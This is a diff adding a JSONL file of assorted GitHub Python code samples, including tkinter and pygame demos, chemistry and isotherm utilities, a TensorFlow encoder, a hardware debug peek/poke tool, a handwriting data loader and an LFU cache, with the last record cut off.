diff --git "a/6249.jsonl" "b/6249.jsonl" new file mode 100644--- /dev/null +++ "b/6249.jsonl" @@ -0,0 +1,1975 @@ +{"seq_id":"11450255013","text":"import tkinter as tk\nfrom tkinter import *\nfrom tkinter.constants import *\nimport random\nfrom tkinter import messagebox\n\ndef font():\n dict = {0: 'Arial', 1: 'Courier', 2: 'Times', 3: 'Helvetica'}\n fontchoice=random.choice(dict)\n print(fontchoice)\n if checkbtn1.getint(0) == 0:\n label.config(font=fontchoice)\n elif checkbtn2.getint(1) == 1:\n label.config(font='calibri')\n print(\"font\",label.config().get(\"font\"))\n else:\n messagebox.showerror('TKINTER FONT', 'Something went wrong')\n\nwindow = tk.Tk()\nwindow.title(\"Slip 6b\")\nwindow.geometry(\"800x600\")\nlabel = tk.Label(window, text=\"Font Style\")\nlabel.grid(column=0, row=0)\nlabel.pack()\ncheckbtn1 = tk.Checkbutton(window, text=\"Font Style\", height=\"2\", width=\"20\", onvalue=1, offvalue=0, command=font)\ncheckbtn1.pack()\ncheckbtn2 = tk.Checkbutton(window, text=\"Font Size\", height=\"2\", width=\"20\")\ncheckbtn2.pack()\ncheckbtn3 = tk.Checkbutton(window, text=\"Font Bold\", height=\"2\", width=\"20\")\ncheckbtn3.pack()\n\nwindow.mainloop()","repo_name":"Snag-hub/PYTHON","sub_path":"slip6b.py","file_name":"slip6b.py","file_ext":"py","file_size_in_byte":1019,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"44087040469","text":"from os.path import exists\nfrom os import mkdir\nimport os\nimport pandas as pd\nimport glob\nimport pygaps.parsing as pgp\nimport pandas as pd\nimport warnings\n\n\ndef strictly_increasing(List):\n increasing = [x < y for x, y in zip(List, List[1:])]\n increasing.append(increasing[-1])\n return increasing\n\n\ndef clean_isotherms(\n input_dir: str = './',\n output_dir: str = './clean/'\n):\n print(f'Cleaning isotherms in {input_dir} and placing in {output_dir}...')\n if not exists(output_dir):\n mkdir(output_dir)\n\n files = glob.glob(f'{input_dir}*.csv')\n for f in files:\n isotherm = pd.read_csv(\n f,\n names=['relative_pressure', 'loading'],\n header=0,\n )\n\n relative_pressure = isotherm['relative_pressure'].to_list()\n increasing = strictly_increasing(relative_pressure)\n isotherm = isotherm.assign(increasing=increasing)\n isotherm = isotherm[isotherm.increasing == True]\n isotherm = isotherm.drop(columns=['increasing'])\n\n isotherm.to_csv(\n f'{output_dir}{f.split(input_dir)[1]}',\n index=False,\n )\n\n print(\n f'...{len(files)} cleaned and saved in {output_dir}\\n\\n'\n )\n\n return output_dir\n\n\ndef convert_aif(\n file: str,\n output_dir:str = './csv/',\n):\n filename = os.path.split(file)[1]\n name, ext = os.path.splitext(filename)\n if ext[1:] not in ['aif', 'aiff']:\n return\n\n with warnings.catch_warnings():\n warnings.simplefilter('ignore')\n isotherm = pgp.isotherm_from_aif(file)\n\n pressure = isotherm.data_raw['pressure']\n loading = isotherm.data_raw['loading']\n if 'pressure_saturation' in isotherm.data_raw:\n pressure = pressure / \\\n isotherm.data_raw['pressure_saturation']\n\n df = pd.DataFrame(list\n (zip(\n pressure, loading\n )\n ), columns=['P/P0', 'loading']\n )\n\n if not exists(output_dir):\n mkdir(output_dir)\n df.to_csv(f'{output_dir}{name}.csv')\n\n return name\n\n\ndef convert_aif_dir(\n input_dir: str = './',\n output_dir: str = './csv/'\n):\n aif_files = glob.glob(f'{input_dir}*.aif') + \\\n glob.glob(f'{input_dir}*.aiff')\n if len(aif_files) > 0:\n print(\n f'{len(aif_files)} aif files found in {input_dir}. 
'\n f'converting to csv for use in autobetsi.\\n'\n )\n names = []\n for file in glob.glob(input_dir):\n name = convert_aif(file)\n names.append(name)\n\n return names\n\n","repo_name":"sblanky/autobetsi","sub_path":"autobetsi/cleaning.py","file_name":"cleaning.py","file_ext":"py","file_size_in_byte":2583,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"73124867959","text":"import pygame\nimport os, sys\n\n\nclass ElementoQuimico:\n nomeElemento = ''\n familia = 0\n letra = ''\n\n cor = (0, 0, 0)\n corTexto = (0, 0, 0)\n\n fonteLetra = ''\n fonteNomeElemento = ''\n\n base = 55\n altura = 70\n\n x = 0\n y = 0\n\n # TRATAMENTO DE CORES\n hidrogenio = (220, 220, 220)\n metaisAlcalinos = (255, 165, 0)\n metaisAlcalinosTerrosos = (255, 215, 0)\n familiaBoro = (72, 209, 204)\n familiaCarbono = (107, 142, 35)\n familiaNitrogenio = (34, 139, 34)\n calcogenios = (221, 160, 221)\n halogenios = (255, 105, 180)\n gasesNobres = (135, 206, 250)\n\n def __init__(self, nomeElemento, familia, letra):\n pygame.font.init()\n\n self.nomeElemento = nomeElemento\n self.familia = familia\n self.letra = letra\n\n self.fonteLetra = pygame.font.SysFont('Arial', 30)\n self.fonteNomeElemento = pygame.font.SysFont('Arial', 12)\n\n if int(self.familia) == 0:\n self.cor = self.hidrogenio\n elif int(self.familia) == 1:\n self.cor = self.metaisAlcalinos\n elif int(self.familia) == 2:\n self.cor = self.metaisAlcalinosTerrosos\n elif int(self.familia) == 3:\n self.cor = self.familiaBoro\n elif int(self.familia) == 4:\n self.cor = self.familiaCarbono\n elif int(self.familia) == 5:\n self.cor = self.familiaNitrogenio\n elif int(self.familia) == 6:\n self.cor = self.calcogenios\n elif int(self.familia) == 7:\n self.cor = self.halogenios\n elif int(self.familia) == 8:\n self.cor = self.gasesNobres\n else:\n self.cor = (255, 255, 224)\n\n def desenhaElemento(self, gameDisplay, x, y):\n posicaoNomeElemento = (x + 2, y + 55)\n posicaoLetraElemento = (x + 15, y + 10)\n\n letraElemento = self.fonteLetra.render(self.letra, 1, self.corTexto)\n nomeElemento = self.fonteNomeElemento.render(self.nomeElemento, 1, self.corTexto)\n\n pygame.draw.rect(gameDisplay, self.cor, [x, y, self.base, self.altura])\n\n gameDisplay.blit(letraElemento, posicaoLetraElemento)\n gameDisplay.blit(nomeElemento, posicaoNomeElemento)\n","repo_name":"JoaoVitorJuliao/PCA-EasyCode","sub_path":"quimica/ElementoQuimico.py","file_name":"ElementoQuimico.py","file_ext":"py","file_size_in_byte":2194,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"17148616359","text":"import tensorflow.compat.v1 as tf\ntf.disable_v2_behavior()\nimport numpy as np\n\ndef xavier_init(fan_in, fan_out, constant=1):\n \"\"\" Xavier initialization of network weights\"\"\"\n # https://stackoverflow.com/questions/33640581/how-to-do-xavier-initialization-on-tensorflow\n low = -constant*np.sqrt(6.0/(fan_in + fan_out))\n high = constant*np.sqrt(6.0/(fan_in + fan_out))\n return tf.random_uniform((fan_in, fan_out),\n minval=low, maxval=high,\n dtype=tf.float32)\n\ndef init_u(n_in):\n return tf.Variable(xavier_init(n_in, 1))\n\ndef init_w(n_in):\n return tf.Variable(xavier_init(n_in, 1))\n\ndef init_b(n_in):\n return tf.Variable(xavier_init(n_in, 1))\n\ndef ConditionalEncoder(params):\n n_filters = params[\"n_filters\"] #10\n filter_size = params[\"filter_size\"] #10\n pool_size = params[\"pool_size\"] #5\n n_hidden = params[\"n_hidden\"] #50\n data_format = 
params[\"data_format\"] #channel_last by default: 默认最后一位是channel\n lambda_l2 = params[\"lambda_l2\"] #0.1\n lambda_l2_hidden = params[\"lambda_l2_hidden\"] #0.1\n transfer_func = params[\"transfer_func\"] #tanh\n return tf.keras.Sequential([\n tf.keras.layers.Conv1D(n_filters, filter_size, #output最后一维的维度和filter的个数相等 ()\n data_format=data_format, \n kernel_regularizer=tf.keras.regularizers.l2(lambda_l2), #对该层的权重值进行正则化\n kernel_initializer=tf.orthogonal_initializer()),\n tf.keras.layers.AveragePooling1D(pool_size=pool_size, strides=1, data_format=data_format),\n tf.keras.layers.Flatten(),\n tf.keras.layers.Dense(\n units=n_hidden,\n activation=transfer_func,\n kernel_initializer=tf.orthogonal_initializer(),\n kernel_regularizer=tf.keras.regularizers.l2(lambda_l2_hidden))\n ])","repo_name":"Jimmy-Chen-Ruijie/vi-hds-master-tensorflow","sub_path":"src/encoders.py","file_name":"encoders.py","file_ext":"py","file_size_in_byte":1876,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"19020361399","text":"import functools\nimport inspect\nimport warnings\n\n\ndef _deprecated(reason: str):\n \"\"\"Decorator for deprecated functions/classes.\n\n Example\n @deprecated('use print_a instead.')\n def printA():\n print('A')\n \"\"\"\n\n if isinstance(reason, str):\n\n def decorator(func1):\n\n if inspect.isclass(func1):\n fmt1 = \"Call to deprecated class {name} ({reason}).\"\n else:\n fmt1 = \"Call to deprecated function {name} ({reason}).\"\n\n @functools.wraps(func1)\n def new_func1(*args, **kwargs):\n warnings.simplefilter('always', DeprecationWarning)\n warnings.warn(fmt1.format(name=func1.__name__, reason=reason),\n category=DeprecationWarning,\n stacklevel=2)\n warnings.simplefilter('default', DeprecationWarning)\n return func1(*args, **kwargs)\n\n return new_func1\n\n return decorator\n\n # if no reasons is given\n elif inspect.isclass(reason) or inspect.isfunction(reason):\n func2 = reason\n\n if inspect.isclass(func2):\n fmt2 = \"Call to deprecated class {name}.\"\n else:\n fmt2 = \"Call to deprecated function {name}.\"\n\n @functools.wraps(func2)\n def new_func2(*args, **kwargs):\n warnings.simplefilter('always', DeprecationWarning)\n warnings.warn(fmt2.format(name=func2.__name__),\n category=DeprecationWarning,\n stacklevel=2)\n warnings.simplefilter('default', DeprecationWarning)\n return func2(*args, **kwargs)\n\n return new_func2\n\n else:\n raise TypeError(repr(type(reason)))\n","repo_name":"BaksiLi/chien-shiung","sub_path":"qulab/compatibility.py","file_name":"compatibility.py","file_ext":"py","file_size_in_byte":1752,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"14431832096","text":"import spindry as spd\n\nfrom stk._internal.construction_state.construction_state import (\n ConstructionState,\n)\n\nfrom .optimizer import Optimizer\n\n\nclass Spinner(Optimizer):\n \"\"\"\n Performs Monte Carlo optimisation of host-guest complexes.\n\n Examples:\n\n *Structure Optimization*\n\n Using :class:`.Spinner` will lead to\n :class:`.ConstructedMolecule` structures with better host-guest\n structures. Especially useful for multiple-guest systems and\n removing overlap.\n\n .. 
testcode:: structure-optimization\n\n import stk\n\n bb1 = stk.BuildingBlock(\n smiles='NCCN',\n functional_groups=[stk.PrimaryAminoFactory()],\n )\n bb2 = stk.BuildingBlock(\n smiles='O=CC(C=O)C=O',\n functional_groups=[stk.AldehydeFactory()],\n )\n guest1 = stk.host_guest.Guest(\n building_block=stk.BuildingBlock('c1ccccc1'),\n )\n guest2 = stk.host_guest.Guest(\n building_block=stk.BuildingBlock('C1CCCCC1'),\n )\n cage = stk.ConstructedMolecule(\n topology_graph=stk.cage.FourPlusSix(\n building_blocks=(bb1, bb2),\n optimizer=stk.MCHammer(),\n ),\n )\n\n complex = stk.ConstructedMolecule(\n topology_graph=stk.host_guest.Complex(\n host=stk.BuildingBlock.init_from_molecule(cage),\n guests=(guest1, guest2),\n optimizer=stk.Spinner(),\n ),\n )\n\n Optimisation with :mod:`stk` simply collects the final position\n matrix. The optimisation's trajectory can be output using the\n :mod:`SpinDry` implementation if required by the user\n [#spindry]_. This code is entirely nonphysical and is,\n therefore, completely general to any chemistry.\n\n References:\n\n .. [#spindry] https://github.com/andrewtarzia/SpinDry\n\n \"\"\"\n\n def __init__(\n self,\n step_size: float = 1.5,\n rotation_step_size: float = 5.0,\n num_conformers: int = 50,\n max_attempts: int = 1000,\n nonbond_epsilon: float = 5.0,\n beta: float = 2.0,\n random_seed: int = 1000,\n ) -> None:\n \"\"\"\n Initialize an instance of :class:`.Spinner`.\n\n Parameters:\n step_size: The relative size of the step to take during\n step.\n\n rotation_step_size: The relative size of the rotation to\n take during step.\n\n num_conformers: Number of conformers to extract.\n\n max_attempts: Maximum number of MC moves to try to generate\n conformers.\n\n nonbond_epsilon: Value of epsilon used in the nonbonded\n potential in MC moves. Determines strength of the\n nonbonded potential.\n\n beta: Value of beta used in the in MC moves. 
Beta takes the\n place of the inverse boltzmann temperature.\n\n random_seed: Random seed to use for MC algorithm.\n\n \"\"\"\n\n self._optimizer = spd.Spinner(\n step_size=step_size,\n rotation_step_size=rotation_step_size,\n num_conformers=num_conformers,\n max_attempts=max_attempts,\n potential_function=spd.SpdPotential(\n nonbond_epsilon=nonbond_epsilon,\n ),\n beta=beta,\n random_seed=random_seed,\n )\n\n def optimize(self, state: ConstructionState) -> ConstructionState:\n supramolecule = spd.SupraMolecule(\n atoms=(\n spd.Atom(\n id=atom.get_id(),\n element_string=atom.__class__.__name__,\n )\n for atom in state.get_atoms()\n ),\n bonds=(\n spd.Bond(\n id=i,\n atom_ids=(\n bond.get_atom1().get_id(),\n bond.get_atom2().get_id(),\n ),\n )\n for i, bond in enumerate(state.get_bonds())\n ),\n position_matrix=state.get_position_matrix(),\n )\n\n conformer = self._optimizer.get_final_conformer(supramolecule)\n return state.with_position_matrix(\n position_matrix=conformer.get_position_matrix(),\n )\n","repo_name":"lukasturcani/stk","sub_path":"src/stk/_internal/optimizers/spinner.py","file_name":"spinner.py","file_ext":"py","file_size_in_byte":4456,"program_lang":"python","lang":"en","doc_type":"code","stars":212,"dataset":"github-code","pt":"40"} +{"seq_id":"23870563275","text":"import sys\nimport struct\nfrom debugpipe import DebugPipe\nimport getopt\n\n\n################################################################################\n\ndef padUpToWord(data):\n l = len(data) & 3\n if l > 0:\n return data + bytearray([0 for x in range(4-l)])\n else:\n return data\n\ndef quick_test(dp):\n str = padUpToWord('This is an amazing string!')\n print(str)\n dp.write(0, str)\n\n rstr = dp.read(0, len(str))\n\n if str == rstr:\n print('Success')\n else:\n print('String mismatch: \"%s\" vs \"%s\"' % (str, rstr))\n\n\ndef write_file(dp, addr, name):\n with open(name, \"rb\") as infile:\n fdata = infile.read()\n addr = int(addr, 0)\n waddr = addr & ~3;\n if (addr & 3) != 0:\n print(\"WARNING: Rounding given address 0x%x down to 0x%x\" % (addr, waddr))\n\n l = len(fdata)\n if (l & 3) != 0:\n print(\"WARNING: Zero-padding data to extend to 4-byte alignment (size %d)\" \\\n % (l))\n fdata = fdata + bytearray([0 for x in range(4-(l & 3))])\n dp.write(waddr, fdata, verbose=True)\n\n\ndef read_file(dp, addr, length, name):\n addr = int(addr, 0)\n raddr = addr & ~3;\n if (addr & 3) != 0:\n print(\"WARNING: Rounding given address 0x%x down to 0x%x\" % (addr, raddr))\n\n length = int(length, 0)\n if (length & 3) != 0:\n print(\"WARNING: Truncating length %d to 4-byte alignment\" \\\n % (length))\n length &= length & ~3\n wdata = dp.read(raddr, length, verbose=True)\n\n with open(name, \"wb\") as outfile:\n outfile.write(wdata)\n\n\ndef read_word(dp, addr, big_endian=False):\n addr = int(addr, 0)\n raddr = addr & ~3;\n if (addr & 3) != 0:\n print(\"WARNING: Rounding given address 0x%x down to 0x%x\" % (addr, raddr))\n i = dp.read32(raddr, big_endian=big_endian)\n print(\"[%08x] => %08x\" % (raddr, i))\n\n\ndef write_word(dp, addr, val, big_endian=False):\n addr = int(addr, 0)\n val = int(val, 0)\n waddr = addr & ~3;\n if (addr & 3) != 0:\n print(\"WARNING: Rounding given address 0x%x down to 0x%x\" % (addr, waddr))\n dp.write32(waddr, val, big_endian=big_endian)\n print(\"[%08x] <= %08x\" % (waddr, val))\n\n\ndef usage(s):\n print(\"%s [options] \\n\" \\\n \"\\tOptions: \\n\" \\\n \"\\t\\t-s Connect using serial link via tty\\n\" \\\n \"\\t\\t-t Connect using TCP socket to host\\n\" \\\n \"\\t\\t-f Connect 
using FTDI url\\n\" \\\n \"\\t\\t-v Verbose debug\\n\" \\\n \"\\t\\t-b Big-endian read/write word\\n\" \\\n \"\\tCommands: \\n\" \\\n \"\\t\\ttest Quick test\\n\" \\\n \"\\t\\tread Read file from address\\n\" \\\n \"\\t\\twrite Write file to address\\n\" \\\n \"\\t\\trw Read word from address\\n\" \\\n \"\\t\\tww Write word to address\\n\" \\\n % (s))\n\n################################################################################\n\n\ntry:\n opts, args = getopt.getopt(sys.argv[1:], \"hvbs:t:f:\")\nexcept getopt.GetoptError as err:\n usage(sys.argv[0])\n print(\"Invocation error: \" + str(err))\n sys.exit(1)\n\nverbose = False\nconn = None\nconn_arg = \"\"\nbig_endian = False\n\nfor o, a in opts:\n if o == \"-h\":\n usage(sys.argv[0])\n sys.exit(1)\n elif o == \"-v\":\n verbose = True\n elif o == \"-b\":\n big_endian = True\n elif o == \"-s\" or o == \"-t\" or o == \"-f\":\n if conn is not None:\n usage(sys.argv[0])\n print(\"Multiple connections specified\");\n sys.exit(1)\n conn = o\n conn_arg = a\n\n\ndp = None\nif conn is None:\n usage(sys.argv[0])\n print(\"Need one of -s or -t!\");\n sys.exit(1)\nelif conn == \"-s\":\n dp = DebugPipe(tty=conn_arg, debug=verbose)\nelif conn == \"-t\":\n dp = DebugPipe(host=conn_arg, debug=verbose)\nelif conn == \"-f\":\n dp = DebugPipe(url=conn_arg, debug=verbose)\n\n\n# Parse commands:\nna = len(args)\nif na == 1 and args[0] == \"test\":\n quick_test(dp)\nelif na == 4 and args[0] == \"read\":\n read_file(dp, args[1], args[2], args[3])\nelif na == 3 and args[0] == \"write\":\n write_file(dp, args[1], args[2])\nelif na == 2 and args[0] == \"rw\":\n read_word(dp, args[1], big_endian)\nelif na == 3 and args[0] == \"ww\":\n write_word(dp, args[1], args[2], big_endian)\nelse:\n usage(sys.argv[0])\n sys.exit(1)\n\ndp.disconnect()\n","repo_name":"evansm7/MR-sys","sub_path":"tools/debug_peek_poke.py","file_name":"debug_peek_poke.py","file_ext":"py","file_size_in_byte":4563,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"9691745368","text":"# # for\n# friends= ['ali, mahdi, hosein']\n# count=0;\n\n# for i in friends :\n# print('hi', i);\n# count=count+1;\n\n# print('i said ....', count, 'hello' );\n\n\nfor i in range(10):\n if not i % 2 == 0:\n print(i+1)\n","repo_name":"devcodeplus/python-jadi-Intro","sub_path":"z-ex-02-for.py","file_name":"z-ex-02-for.py","file_ext":"py","file_size_in_byte":218,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"21204496207","text":"# -*- coding: utf-8 -*-\r\n\r\nfrom __future__ import division\r\nfrom __future__ import print_function\r\n\r\nimport os\r\nimport random\r\nimport codecs\r\nimport numpy as np\r\nimport cv2\r\nfrom SamplePreprocessor import preprocess\r\n\r\n\r\nclass Sample:\r\n\t\"sample from the dataset\"\r\n\tdef __init__(self, gtText, filePath):\r\n\t\tself.gtText = gtText\r\n\t\tself.filePath = filePath\r\n\r\n\r\nclass Batch:\r\n\t\"batch containing images and ground truth texts\"\r\n\tdef __init__(self, gtTexts, imgs):\r\n\t\tself.imgs = np.stack(imgs, axis=0)\r\n\t\tself.gtTexts = gtTexts\r\n\r\n\r\nclass DataLoader:\r\n\t\"loads data which corresponds to IAM format, see: http://www.fki.inf.unibe.ch/databases/iam-handwriting-database\" \r\n\r\n\tdef __init__(self, filePath, batchSize, imgSize, maxTextLen):\r\n\t\t\"loader for dataset at given location, preprocess images and text according to parameters\"\r\n\r\n\t\tassert filePath[-1]=='/' # should end with 
'/'\r\n\r\n\t\tself.dataAugmentation = False\r\n\t\tself.currIdx = 0\r\n\t\tself.batchSize = batchSize\r\n\t\tself.imgSize = imgSize\r\n\t\tself.samples = []\r\n\t\t# use your own path and trick to read the images with the txt file\r\n\t\twith codecs.open(filePath+'full.txt', \"r\", encoding='utf-8') as f:\r\n\t\t\tlines = f.readlines()\r\n\t\tlines = [x.strip() for x in lines] # removing newline\r\n\t\tchars = set()\r\n\t\tprint(lines[2])\r\n\t\tfor line in lines:\r\n\t\t\t# ignore comment line\r\n\t\t\tif not line or line[0]=='#':\r\n\t\t\t\tcontinue\r\n\t\t\t\r\n\t\t\tlineSplit = line.strip().split(' ')\r\n\r\n\t\t\tif lineSplit[0] == '\\ufeff': # since reading first line give '\\ufeff'\r\n\t\t\t\tcontinue\r\n\r\n\t\t\tfileName = filePath + lineSplit[0]\r\n\r\n\t\t\t# GT text are columns starting at 1\r\n\t\t\tgtText = self.truncateLabel(' '.join(lineSplit[1]), maxTextLen)\r\n\t\t\tchars = chars.union(set(list(gtText)))\r\n\r\n\t\t\t# check if image is not empty\r\n\t\t\tif not os.path.getsize(fileName):\r\n\t\t\t\t#bad_samples.append(lineSplit[0] + '.jpg')\r\n\t\t\t\tcontinue\r\n\r\n\t\t\t# put sample into list\r\n\t\t\tself.samples.append(Sample(gtText, fileName))\r\n\r\n\r\n\r\n\t\t# split into training and validation set: 95% - 5%\r\n\t\tsplitIdx = int(0.95 * len(self.samples))\r\n\t\tself.trainSamples = self.samples[:splitIdx]\r\n\t\tself.validationSamples = self.samples[splitIdx:]\r\n\r\n\t\t# put words into lists\r\n\t\tself.trainWords = [x.gtText for x in self.trainSamples]\r\n\t\tself.validationWords = [x.gtText for x in self.validationSamples]\r\n\r\n\t\t# number of randomly chosen samples per epoch for training \r\n\t\tself.numTrainSamplesPerEpoch = 25000 \r\n\t\t\r\n\t\t# start with train set\r\n\t\tself.trainSet()\r\n\r\n\t\t# list of all chars in dataset\r\n\t\tself.charList = sorted(list(chars))\r\n\t\t# print(\"TrainSet: {}, TestSet: {}\".format(len(self.trainSamples), len(self.validationSamples)))\r\n\t\t# print(\"Total chars: \",len(self.charList)) # length: 109\r\n\t\t# charList = ''.join([str(x) for x in self.charList])\r\n\t\t# print(charList)\r\n\t\t# codecs.open('../model/charList.txt','w', encoding='utf-8').write(charList)\r\n\r\n\tdef truncateLabel(self, text, maxTextLen):\r\n\t\t# ctc_loss can't compute loss if it cannot find a mapping between text label and input \r\n\t\t# labels. 
Repeat letters cost double because of the blank symbol needing to be inserted.\r\n\t\t# If a too-long label is provided, ctc_loss returns an infinite gradient\r\n\t\tcost = 0\r\n\t\tfor i in range(len(text)):\r\n\t\t\tif i != 0 and text[i] == text[i-1]:\r\n\t\t\t\tcost += 2\r\n\t\t\telse:\r\n\t\t\t\tcost += 1\r\n\t\t\tif cost > maxTextLen:\r\n\t\t\t\treturn text[:i]\r\n\t\treturn text\r\n\r\n\tdef trainSet(self):\r\n\t\t\"switch to randomly chosen subset of training set\"\r\n\t\tself.dataAugmentation = True\r\n\t\tself.currIdx = 0\r\n\t\trandom.shuffle(self.trainSamples)\r\n\t\tself.samples = self.trainSamples[:self.numTrainSamplesPerEpoch]\r\n\r\n\tdef validationSet(self):\r\n\t\t\"switch to validation set\"\r\n\t\tself.dataAugmentation = False\r\n\t\tself.currIdx = 0\r\n\t\tself.samples = self.validationSamples\r\n\r\n\tdef getIteratorInfo(self):\r\n\t\t\"current batch index and overall number of batches\"\r\n\t\treturn (self.currIdx // self.batchSize + 1, len(self.samples) // self.batchSize)\r\n\r\n\tdef hasNext(self):\r\n\t\t\"iterator\"\r\n\t\treturn self.currIdx + self.batchSize <= len(self.samples)\r\n\t\t\r\n\tdef getNext(self):\r\n\t\t\"iterator\"\r\n\t\tbatchRange = range(self.currIdx, self.currIdx + self.batchSize)\r\n\t\tgtTexts = [self.samples[i].gtText for i in batchRange]\r\n\t\timgs = [preprocess(cv2.imread(self.samples[i].filePath, cv2.IMREAD_GRAYSCALE), self.imgSize, self.dataAugmentation) for i in batchRange]\r\n\t\tself.currIdx += self.batchSize\r\n\t\treturn Batch(gtTexts, imgs)\r\n\r\n\r\n#DataLoader('../data/', 50, (128,32), 32)\r\n","repo_name":"sushant097/Devnagari-Handwritten-Word-Recongition-with-Deep-Learning","sub_path":"src/DataLoader.py","file_name":"DataLoader.py","file_ext":"py","file_size_in_byte":4380,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"40"} +{"seq_id":"6484493404","text":"import pygame\nimport random\nimport math\npygame.init()\n\npygame.display.set_caption(\"고군분투\")\n\nscreen_width = 800\nscreen_height = 500\nscore = 0\n# font\npygame.font.init()\nmyFont = pygame.font.SysFont(\"Comic Sans MS\", 30)\nscreen = pygame.display.set_mode((screen_width, screen_height))\n\ntrapX1 = 950\ntrapX2 = 1050\n\n\nbg1 = pygame.image.load(\"e:/dev/python_workspace/img/bg1.jpg\")\nbg2 = pygame.image.load(\"e:/dev/python_workspace/img/bg2.jpg\")\nbg1X = 0\nbg2X = screen_width\n\nrun1 = pygame.image.load(\"e:/dev/python_workspace/img/run1.png\")\nrun2 = pygame.image.load(\"e:/dev/python_workspace/img/run2.png\")\nrun3 = pygame.image.load(\"e:/dev/python_workspace/img/run3.png\")\nrun_list = [run1, run2, run3]\nrx = 0\nry = 270\n\ngold = pygame.image.load(\"e:/dev/python_workspace/img/gold.png\")\nsilver = pygame.image.load(\"e:/dev/python_workspace/img/silver.png\")\n\njump = False\njump_Y = 270\njump_status = 0\n\ncnt = 0\nclock = pygame.time.Clock()\nisRunning = True\n\ncoinList = []\ndef makeCoin(coinObj, color):\n c = Coin(screen_width, random.randint(10, 260), coinObj, color)\n coinList.append(c)\n\ndef collision(x1, y1, x2, y2):\n dis = math.sqrt((x2-x1)**2 + (y2-y1)**2)\n result = 0\n if dis < 50:\n result = 1\n return result\n\nclass Coin:\n def __init__(self, x, y, coinObj, color):\n self.x = x\n self.y = y\n self.coinObj = coinObj\n self.color = color\n \n def __del__(self):\n pass\n # print(\"코인 제거됨\")\n \n\nwhile isRunning:\n fps = clock.tick(60)\n \n bg1X -= 5\n bg2X -= 5\n if bg1X == -screen_width: bg1X = screen_width\n if bg2X == -screen_width: bg2X = screen_width\n screen.blit(bg1, (bg1X, 0))\n 
screen.blit(bg2, (bg2X, 0))\n\n \n \n cnt += 1\n screen.blit(run_list[(cnt//10)%3], (rx, ry))\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n isRunning = False\n \n if rx < 0: rx = 0\n if rx > screen_width: rx = screen_width - 100\n \n # if rx >= bg2X+150 or rx <= bg2X+250 :\n \n \n keys = pygame.key.get_pressed()\n if keys[pygame.K_LEFT] == 1: rx -= 5\n if keys[pygame.K_RIGHT] == 1: rx += 5\n if keys[pygame.K_SPACE] == 1: \n jump = True\n jump_Y = ry - 100\n if jump_Y < 0: jump_Y = 0\n jump_status = 0\n \n if jump==True:\n if jump_status == 0: # up\n ry -= 10\n if jump_Y >= ry:\n ry = jump_Y\n jump_status = 1\n else: # down \n ry += 10\n if 270 <= ry:\n ry = 270\n jump_status = 0\n jump_Y = 270\n \n if cnt%20 == 0:\n if (cnt//100)%2:\n makeCoin(gold, 'gold')\n else:\n makeCoin(silver, 'silver')\n \n \n for c in coinList:\n # print(c, c.x, c.y)\n screen.blit(c.coinObj, (c.x, c.y))\n c.x -= 5\n if c.x < -100:\n coinList.remove(c)\n del(c)\n \n for c in coinList:\n if collision(rx+50, ry+55, c.x, c.y) == 1:\n c.x = -150\n if c.color == 'gold':\n score += 20\n else:\n score += 10\n \n \n # print(score)\n txt = myFont.render(\"SCORE : \"+str(score), False, (255, 0, 0))\n screen.blit(txt, (600, 20))\n pygame.display.update()\n \n\npygame.quit()","repo_name":"rafinkang/test_python","sub_path":"day18/hw1.py","file_name":"hw1.py","file_ext":"py","file_size_in_byte":3366,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"44588090630","text":"import collections\nclass ListNode:\n def __init__(self, val=0, prev=None,next=None):\n self.val = val\n self.prev = prev\n self.next = next\nclass LinkedList:\n def __init__(self):\n self.left = ListNode(0)\n self.right = ListNode(0,prev=self.left)\n self.left.next = self.right\n self.map = {}\n def length(self):\n return len(self.map)\n def pushRight(self,val):\n node = ListNode(val,self.right.prev,self.right)\n self.map[val] = node\n self.right.prev = node\n node.prev.next = node\n def pop(self,val):\n if val in self.map:\n node = self.map[val]\n next,prev = node.next,node.prev\n next.prev = prev\n prev.next = next\n self.map.pop(val,None)\n def popLeft(self):\n res = self.left.next.val\n self.pop(self.left.next.val)\n return res\n def update(self,val):\n self.pop(val)\n self.pushRight(val)\nclass LFUCache:\n def __init__(self, capacity: int):\n self.capacity = capacity\n self.count = 0\n self.valMap = {}\n self.countMap = collections.defaultdict(int)\n self.listMap = collections.defaultdict(LinkedList)\n def counter(self,key):\n cnt = self.countMap[key]\n self.countMap[key] += 1\n self.listMap[cnt].pop(key)\n self.listMap[cnt+1].pushRight(key)\n if(self.count == cnt and self.listMap[cnt].length() == 0):\n self.count+=1\n def get(self, key: int) -> int:\n if(not key in self.valMap):\n return -1\n self.counter(key)\n return self.valMap[key]\n def put(self, key: int, value: int) -> None:\n if self.capacity == 0:\n return\n if key not in self.valMap and len(self.valMap) == self.capacity:\n res = self.listMap[self.count].popLeft()\n self.valMap.pop(res)\n self.countMap.pop(res)\n self.valMap[key] = value\n self.counter(key)\n self.count = min(self.count,self.countMap[key])\nlfu = LFUCache(2)\nlfu.put(1, 1)\nlfu.put(2, 2)\nlfu.get(1)\nlfu.put(3, 3)\nlfu.get(2)\nlfu.get(3)\nlfu.put(4, 
